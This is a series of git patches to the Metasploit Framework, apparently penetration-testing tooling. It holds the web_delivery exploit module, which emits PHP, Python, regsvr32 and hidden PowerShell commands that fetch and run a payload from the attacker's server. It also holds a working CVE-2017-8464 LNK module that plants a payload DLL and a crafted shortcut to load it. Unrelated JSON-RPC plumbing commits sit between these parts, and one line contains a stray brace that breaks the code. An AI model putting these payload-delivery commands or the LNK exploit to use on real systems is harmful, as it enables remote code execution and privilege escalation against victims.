'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], - ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], + ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => @@ -84,39 +84,43 @@ class MetasploitModule < Msf::Exploit::Remote ) end + + def primer + url = get_uri + print_status("Run the following command on the target machine:") + case target.name + when 'PHP' + print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));")) + when 'Python' + print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());")) + when 'PSH' + print_line(gen_psh(url)) + when 'Regsvr32' + print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + end + end + + def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - print_status("Handling .sct Request") psh = gen_psh(get_uri) data = gen_sct_file(psh) - send_response(cli, data, 'Content-Type' => 'text/plain') elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' - print_status("Delivering Payload") data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - print_status("Delivering Payload") data = %Q(#{payload.encoded}) end - send_response(cli, data, 'Content-Type' => 'application/octet-stream') - end - def primer - url = get_uri - print_status('Run the following command on the target machine:') - case target.name - when 'PHP' - print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when 'Python' - print_line('Python:') - print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") - when 'PSH' - print_line gen_psh(url) - when 'Regsvr32' - print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering Payload") + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end end @@ -125,13 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) download_and_run = "#{ignore_cert}#{download_string}" - print_line generate_psh_command_line( - return generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end + return generate_psh_command_line(noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) end @@ -143,4 +144,4 @@ class MetasploitModule < Msf::Exploit::Remote def gen_sct_file(command) %{} end -end \ No newline at end of file +end From accb77d268e4ada135ff4df82b5b2dc7c190a9f4 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Thu, 7 Sep 2017 10:55:29 +0100 Subject: [PATCH 010/254] Add PSH (Binary) as a target to web_delivery --- modules/exploits/multi/script/web_delivery.rb | 63 ++++++++++++++++--- 1 file changed, 53 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 5b652e1a7c..873185fd37 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking + include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer @@ -31,6 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. + + "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. ), 'License' => MSF_LICENSE, 'Author' => @@ -40,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) 'Trenton Ivey', # AppLocker MSF Module (kn0) + 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features ], 'DefaultOptions' => { @@ -71,6 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote ['Regsvr32', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, @@ -79,32 +87,43 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ]) + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), + OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), ], self.class ) end def primer - url = get_uri + php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") + python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") + regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) + print_status("Run the following command on the target machine:") case target.name when 'PHP' - print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));")) + print_line("#{php}") when 'Python' - print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());")) + print_line("#{python}") when 'PSH' - print_line(gen_psh(url)) + psh = gen_psh("#{get_uri}", "string") + print_line("#{psh}") when 'Regsvr32' - print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + print_line("#{regsvr}") + when 'PSH (Binary)' + psh = gen_psh("#{get_uri}", "download") + print_line("#{psh}") end end def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - psh = gen_psh(get_uri) + psh = gen_psh("#{get_uri}", "string") data = gen_sct_file(psh) + elsif target.name.include? 'PSH (Binary)' + data = generate_payload_exe elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, @@ -125,10 +144,34 @@ class MetasploitModule < Msf::Exploit::Remote end - def gen_psh(url) + def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) - download_and_run = "#{ignore_cert}#{download_string}" + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + download_and_run = "#{ignore_cert}#{download_string}" + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#{filename}')) + + # Generate download PowerShell command + #download_string = Rex::Powershell::PshMethods.download(url, "$z") # Can't use, due to single vs double quotes in the URL + download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^ + + # Join PowerShell commands up + download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z" + end + + # Generate main PowerShell command return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run From 4ea8f639a3c3fd42184646d18570fa520419fee4 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Fri, 22 Sep 2017 11:42:32 -0500 Subject: [PATCH 011/254] Add host and service reporting to external modules --- lib/msf/core/module/external.rb | 75 ++++++++++++++---- lib/msf/core/modules/external/bridge.rb | 77 ++++++++++++++----- lib/msf/core/modules/external/message.rb | 20 ++++- .../external/python/metasploit/module.py | 31 ++++++-- lib/msf/core/modules/external/shim.rb | 3 + .../external/templates/capture_server.erb | 1 - 6 files changed, 163 insertions(+), 44 deletions(-) diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 3e4ac1a451..ed9705a942 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb @@ -1,23 +1,72 @@ +include Msf::Auxiliary::Report + module Msf::Module::External def wait_status(mod) while mod.running m = mod.get_status if m - case m['level'] - when 'error' - print_error m['message'] - when 'warning' - print_warning m['message'] - when 'good' - print_good m['message'] - when 'info' - print_status m['message'] - when 'debug' - vprint_status m['message'] - else - print_status m['message'] + case m.method + when :message + log_output(m) + when :report + process_report(m) + when :reply + # we're done + break end end end end + + def log_output(m) + message = m.params['message'] + + case m.params['level'] + when 'error' + print_error message + when 'warning' + print_warning message + when 'good' + print_good message + when 'info' + print_status message + when 'debug' + vprint_status message + else + print_status message + end + end + + def process_report(m) + data = m.params['data'] + + case m.params['type'] + when 'host' + # Required + host = {host: data['host']} + + # Optional + host[:state] = data['state'] if data['state'] # TODO: validate -- one of the Msf::HostState constants (unknown, alive, dead) + host[:os_name] = data['os_name'] if data['os_name'] + host[:os_flavor] = data['os_flavor'] if data['os_flavor'] + host[:os_sp] = data['os_sp'] if data['os_sp'] + host[:os_lang] = data['os_lang'] if data['os_lang'] + host[:arch] = data['arch'] if data['arch'] # TODO: validate -- one of the ARCH_* constants + host[:mac] = data['mac'] if data['mac'] + host[:scope] = data['scope'] if data['scope'] + host[:virtual_host] = data['virtual_host'] if data['virtual_host'] + + report_host(host) + when 'service' + # Required + service = {host: data['host'], port: data['port'], proto: data['proto']} + + # Optional + service[:name] = data['name'] if data['name'] + + report_service(service) + else + print_warning "Skipping unrecognized report type #{m.params['type']}" + end + end end diff --git a/lib/msf/core/modules/external/bridge.rb b/lib/msf/core/modules/external/bridge.rb index 0a031d668c..5ffcc6b0a2 100644 --- a/lib/msf/core/modules/external/bridge.rb +++ b/lib/msf/core/modules/external/bridge.rb @@ -2,6 +2,7 @@ require 'msf/core/modules/external' require 'msf/core/modules/external/message' require 'open3' +require 'json' class Msf::Modules::External::Bridge @@ -26,14 +27,13 @@ class Msf::Modules::External::Bridge def get_status if self.running - n = receive_notification - if n && n['params'] - n['params'] - else + m = receive_notification + if m.nil? close_ios self.running = false - n['response'] if n end + + return m end end @@ -41,30 +41,33 @@ class Msf::Modules::External::Bridge self.env = {} self.running = false self.path = module_path + self.cmd = [self.path, self.path] + self.messages = Queue.new end protected attr_writer :path, :running - attr_accessor :env, :ios + attr_accessor :cmd, :env, :ios, :messages def describe resp = send_receive(Msf::Modules::External::Message.new(:describe)) close_ios - resp['response'] + resp.params end - # XXX TODO non-blocking writes, check write lengths, non-blocking JSON parse loop read + # XXX TODO non-blocking writes, check write lengths def send_receive(message) send(message) - read_json(message.id, self.ios[1]) + recv(message.id) end def send(message) - input, output, status = ::Open3.popen3(env, [self.path, self.path]) + input, output, status = ::Open3.popen3(self.env, self.cmd) self.ios = [input, output, status] - case Rex::ThreadSafe.select(nil, [input], nil, 0.1) + # We would call Rex::Threadsafe directly, but that would require rex for standalone use + case select(nil, [input], nil, 0.1) when nil raise "Cannot run module #{self.path}" when [[], [input], []] @@ -76,12 +79,10 @@ class Msf::Modules::External::Bridge end def receive_notification - input, output, status = self.ios - case Rex::ThreadSafe.select([output], nil, nil, 10) - when nil - nil - when [[output], [], []] - read_json(nil, output) + if self.messages.empty? + recv + else + self.messages.pop end end @@ -89,10 +90,46 @@ class Msf::Modules::External::Bridge fd.write(json) end - def read_json(id, fd) + def recv(filter_id=nil, timeout=600) + _, fd, _ = self.ios + + # Multiple messages can come over the wire all at once, and since yajl + # doesn't play nice with windows, we have to emulate a state machine to + # read just enough off the wire to get one request at a time. Since + # Windows cannot do a nonblocking read on a pipe, we are forced to do a + # whole lot of `select` syscalls :( + buf = "" begin - resp = fd.readpartial(10_000) - JSON.parse(resp) + loop do + # We would call Rex::Threadsafe directly, but that would require Rex for standalone use + case select([fd], nil, nil, timeout) + when nil + # This is what we would have gotten without Rex and what `readpartial` can also raise + raise EOFError.new + when [[fd], [], []] + c = fd.readpartial(1) + buf << c + + # This is so we don't end up calling JSON.parse on every char and + # having to catch an exception. Windows can't do nonblock on pipes, + # so we still have to do the select each time. + break if c == '}' + end + end + + m = Msf::Modules::External::Message.from_module(JSON.parse(buf)) + if filter_id && m.id != filter_id + # We are filtering for a response to a particular message, but we got + # something else, store the message and try again + self.messages.push m + read_json(filter_id, timeout) + else + # Either we weren't filtering, or we got what we were looking for + m + end + rescue JSON::ParserError + # Probably an incomplete response, but no way to really tell + retry rescue EOFError => e {} end diff --git a/lib/msf/core/modules/external/message.rb b/lib/msf/core/modules/external/message.rb index 429e47fc00..ba3b739a71 100644 --- a/lib/msf/core/modules/external/message.rb +++ b/lib/msf/core/modules/external/message.rb @@ -2,11 +2,25 @@ require 'msf/core/modules/external' require 'base64' require 'json' +require 'securerandom' class Msf::Modules::External::Message - attr_reader :method, :id - attr_accessor :params + attr_reader :method + attr_accessor :params, :id + + def self.from_module(j) + if j['method'] + m = self.new(j['method'].to_sym) + m.params = j['params'] + m + elsif j['response'] + m = self.new(:reply) + m.params = j['response'] + m.id = j['id'] + m + end + end def initialize(m) self.method = m @@ -20,5 +34,5 @@ class Msf::Modules::External::Message protected - attr_writer :method, :id + attr_writer :method end diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 288a8065b2..2f12c8210d 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py @@ -1,20 +1,37 @@ import sys, os, json def log(message, level='info'): - print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': { + rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': { 'level': level, 'message': message - }})) - sys.stdout.flush() + }}) + +def report_host(ip, opts={}): + host = opts.copy() + host.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'host', 'data': host + }}) + +def report_service(ip, opts={}): + service = opts.copy() + service.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'service', 'data': service + }}) + def run(metadata, exploit): req = json.loads(os.read(0, 10000)) if req['method'] == 'describe': - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})) + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': args = req['params'] exploit(args) - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': { + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': { 'message': 'Exploit completed' - }})) - sys.stdout.flush() + }}) + +def rpc_send(req): + print(json.dumps(req)) + sys.stdout.flush() diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index 4b64d8871f..903f659799 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -11,6 +11,9 @@ class Msf::Modules::External::Shim remote_exploit_cmd_stager(mod) when 'capture_server' capture_server(mod) + else + # TODO have a nice load error show up in the logs + '' end end diff --git a/lib/msf/core/modules/external/templates/capture_server.erb b/lib/msf/core/modules/external/templates/capture_server.erb index cbcb4735b8..853350fa67 100644 --- a/lib/msf/core/modules/external/templates/capture_server.erb +++ b/lib/msf/core/modules/external/templates/capture_server.erb @@ -2,7 +2,6 @@ require 'msf/core/modules/external/bridge' require 'msf/core/module/external' class MetasploitModule < Msf::Auxiliary - # include Msf::Auxiliary::Report include Msf::Module::External def initialize From 62aac450f8951ef13ae637bda0d0b2c4ed791607 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Fri, 22 Sep 2017 11:43:26 -0500 Subject: [PATCH 012/254] Change confusing variable name --- lib/msf/core/module_manager/loading.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index 4968937ae4..98d9a1c56d 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -116,8 +116,8 @@ module Msf::ModuleManager::Loading loaders.each do |loader| if loader.loadable?(path) - count_by_type.merge!(loader.load_modules(path, options)) do |key, old, new| - old + new + count_by_type.merge!(loader.load_modules(path, options)) do |key, prev, now| + prev + now end end end From 1ee590ac0781e1a9a701dd2b2b14e8454030a59a Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Mon, 25 Sep 2017 13:45:06 +0100 Subject: [PATCH 013/254] Move over to rex-powershell and version bump Version bump for: - https://github.com/rapid7/rex-powershell/pull/10 - https://github.com/rapid7/rex-powershell/pull/11 --- metasploit-framework.gemspec | 2 +- modules/exploits/multi/script/web_delivery.rb | 9 +++------ 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index ec4ed157c9..c796bb97d9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 873185fd37..707f1ca524 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -149,7 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote if method.include? 'string' download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) - download_and_run = "#{ignore_cert}#{download_string}" else # Random filename to use, if there isn't anything set random = "#{rand_text_alphanumeric 8}.exe" @@ -164,13 +163,11 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#{filename}')) # Generate download PowerShell command - #download_string = Rex::Powershell::PshMethods.download(url, "$z") # Can't use, due to single vs double quotes in the URL - download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^ - - # Join PowerShell commands up - download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z" + download_string = Rex::Powershell::PshMethods.download_run(url, file}) end + download_and_run = "#{ignore_cert}#{download_string}" + # Generate main PowerShell command return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', From 825ad940e666360c652609d9c34d711bd27b7a25 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 3 Oct 2017 09:49:24 -0400 Subject: [PATCH 014/254] Update the advanced option names and a typo --- .../fileformat/cve_2017_8464_lnk_rce.rb | 2 +- .../windows/local/cve_2017_8464_lnk_lpe.rb | 170 ++++++++++++++++++ 2 files changed, 171 insertions(+), 1 deletion(-) create mode 100644 modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index a91c80694e..252bb7f97e 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process' + 'EXITFUNC' => 'thread' }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb new file mode 100644 index 0000000000..6d2e32a57d --- /dev/null +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -0,0 +1,170 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'LNK Code Execution Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) + that contain a dynamic icon, loaded from a malicious DLL. + + This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is + similar except an additional SpecialFolderDataBlock is included. The folder ID set + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass + the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary + DLL file. + + If no PATH is specified, the module will use drive letters D through Z so the files + may be placed in the root path of a drive such as a shared VM folder or USB drive. + }, + 'Author' => + [ + 'Uncredited', # vulnerability discovery + 'Yorick Koster', # msf module + 'Spencer McIntyre' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-8464'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], + ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup + ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format + ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'], + ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'WfsDelay' => 45, + }, + 'Arch' => [ARCH_X86, ARCH_X64], + 'Payload' => + { + 'Space' => 2048 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { 'Arch' => ARCH_ANY } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows x86', { 'Arch' => ARCH_X86 } ] + ], + 'DefaultTarget' => 0, # Default target is Automatic + 'DisclosureDate' => 'Jun 13 2017' + ) + ) + + register_options( + [ + OptString.new('FILENAME', [false, 'The LNK file']), + OptString.new('DLLNAME', [false, 'The DLL file containing the payload']), + OptString.new('PATH', [false, 'An explicit path to where the files should be written to']) + ] + ) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), + OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), + OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player']) + ] + ) + end + + def exploit + path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464') + arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] + datastore['EXE::Path'] = path + datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") + + path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path.chomp!("\\") + + dll = generate_payload_dll + dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll" + dll_path = write_file("#{path}\\#{dll_name}", dll) + + lnk = generate_link("#{path}\\#{dll_name}") + lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk" + lnk_path = write_file("#{path}\\#{lnk_filename}", lnk) + end + + def generate_link(path) + vprint_status("Generating LNK file to load: #{path}") + path << "\x00" + display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name + comment = datastore['LNK_COMMENT'].dup << "\x00" + + # Control Panel Applet ItemID with our DLL + cpl_applet = [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00 + ].pack('C*') + cpl_applet << [path.length].pack('v') + cpl_applet << [display_name.length].pack('v') + cpl_applet << path.unpack('C*').pack('v*') + cpl_applet << display_name.unpack('C*').pack('v*') + cpl_applet << comment.unpack('C*').pack('v*') + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C + 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 + 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) + 0x00, 0x00, 0x00, 0x00, # FileAttributes + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime + 0x00, 0x00, 0x00, 0x00, # FileSize + 0x00, 0x00, 0x00, 0x00, # IconIndex + 0x00, 0x00, 0x00, 0x00, # ShowCommand + 0x00, 0x00, # HotKey + 0x00, 0x00, # Reserved1 + 0x00, 0x00, 0x00, 0x00, # Reserved2 + 0x00, 0x00, 0x00, 0x00 # Reserved3 + ].pack('C*') + + # IDList + idlist_data = '' + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + # All Control Panel Items + 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [cpl_applet.length + 2].pack('v') + idlist_data << cpl_applet + idlist_data << [0x00].pack('v') # TerminalID + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData + # SpecialFolderDataBlock + ret << [ + 0x10, 0x00, 0x00, 0x00, # BlockSize + 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 + 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel) + 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList + ].pack('C*') + # TerminalBlock + ret << [0x00, 0x00, 0x00, 0x00].pack('V') + ret + end +end From d0ebfa195082e712049bd9fc018a17940b847630 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 3 Oct 2017 13:43:49 -0400 Subject: [PATCH 015/254] Change the template technicque to work as an LPE --- data/exploits/cve-2017-8464/src/build.sh | 2 + data/exploits/cve-2017-8464/src/template.c | 251 ++++++++++++++---- data/exploits/cve-2017-8464/src/template.h | 8 + .../cve-2017-8464/template_x64_windows.dll | Bin 19456 -> 21504 bytes .../cve-2017-8464/template_x86_windows.dll | Bin 14848 -> 17408 bytes .../windows/local/cve_2017_8464_lnk_lpe.rb | 14 +- 6 files changed, 222 insertions(+), 53 deletions(-) mode change 100755 => 100644 data/exploits/cve-2017-8464/template_x64_windows.dll mode change 100755 => 100644 data/exploits/cve-2017-8464/template_x86_windows.dll diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh index 878e3e3fa8..202daa5413 100755 --- a/data/exploits/cve-2017-8464/src/build.sh +++ b/data/exploits/cve-2017-8464/src/build.sh @@ -8,8 +8,10 @@ ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll ${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll rm -f temp.dll *.o +chmod -x ../template_x64_windows.dll ${CCx86}-gcc -c -Os template.c -Wall -shared ${CCx86}-dllwrap --def template.def *.o -o temp.dll ${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll rm -f temp.dll *.o +chmod -x ../template_x86_windows.dll diff --git a/data/exploits/cve-2017-8464/src/template.c b/data/exploits/cve-2017-8464/src/template.c index 01553dc914..af8924e605 100644 --- a/data/exploits/cve-2017-8464/src/template.c +++ b/data/exploits/cve-2017-8464/src/template.c @@ -1,25 +1,17 @@ -// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll -// - removed ExitThread(0) to prevent an Explorer crash -// - added Mutex to prevent invoking payload multiple times (at least try) #include +#include +#include +#include +#include + #include "template.h" -void inline_bzero(void *p, size_t l) -{ - BYTE *q = (BYTE *)p; - size_t x = 0; - for (x = 0; x < l; x++) - *(q++) = 0x00; -} +void ExecutePayload(HANDLE hDll); -void ExecutePayload(void); - -BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) -{ - switch (dwReason) - { +BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + switch (dwReason) { case DLL_PROCESS_ATTACH: - ExecutePayload(); + ExecutePayload(hDll); break; case DLL_PROCESS_DETACH: @@ -31,65 +23,232 @@ BOOL WINAPI DllMain (HANDLE hDll, 